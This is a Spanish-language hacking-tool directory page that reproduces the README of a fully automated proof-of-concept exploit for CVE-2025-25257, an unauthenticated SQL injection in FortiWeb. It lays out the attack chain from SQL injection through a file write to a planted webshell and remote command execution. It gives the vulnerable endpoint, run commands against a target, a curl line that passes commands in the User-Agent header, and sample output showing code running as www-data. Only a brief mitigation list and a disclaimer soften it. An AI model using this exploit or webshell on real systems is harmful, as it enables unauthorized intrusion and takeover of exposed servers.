Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-25257 — PoC para CVE-2025-25257, una inyección SQL crítica sin autenticación en FortiWeb. Explota SQLi mediante el encabezado Authorization para escribir un webshell y obtener RCE. No requiere inicio de sesión. Completamente automatizado. | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC para CVE-2025-25257, una inyección SQL crítica sin autenticación en FortiWeb. Explota SQLi mediante el encabezado Authorization para escribir un webshell y obtener RCE. No requiere inicio de sesión. Completamente automatizado.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
11hace 1 añoAún no revisado
Compartir

🚨 CVE-2025-25257 – Inyección SQL a RCE en FortiWeb

Inyección SQL crítica → Ejecución de Webshell

Descubierto y armado por 0xgh057r3c0n


🧠 Resumen de la vulnerabilidad

CVE-2025-25257 afecta a sistemas FortiWeb que exponen el endpoint /api/fabric/device/status, el cual no sanitiza correctamente la entrada del encabezado Authorization.

Un atacante puede realizar una inyección SQL sin autenticación para escribir un webshell en el servidor y ejecutar comandos de forma remota.


💥 Flujo del ataque

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 Endpoint vulnerable

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 Características del exploit

  • SQLi a través del token Bearer
  • SQL INTO OUTFILE para colocar shell
  • El hook de Python activa chmod
  • Comandos ejecutados mediante User-Agent
  • PoC completamente automatizado

🧪 Uso

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

Luego:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 Requisitos

  • Python 3.6+
  • Módulo requests

Instalación:

root@kitploit:~
pip install requests

📤 Ejemplo de salida

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 Estimación CVSS

MétricaValor
Puntuación base9.8 (CRÍTICO)
Vector de ataqueRed
Privilegios requeridosNinguno
Interacción del usuarioNinguna
ImpactoAlto (C/I/A)

🛡️ Mitigación

  • Actualizar el firmware de FortiWeb (si hay parche disponible)
  • Sanitizar todas las entradas de encabezados
  • Restringir las rutas de escritura de archivos y la ejecución de CGI

👨‍💻 Autor

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ Descargo de responsabilidad

Esta prueba de concepto es solo para fines educativos y pruebas autorizadas. Úsela bajo su propio riesgo. El autor no se responsabiliza por el mal uso.


Descargar herramienta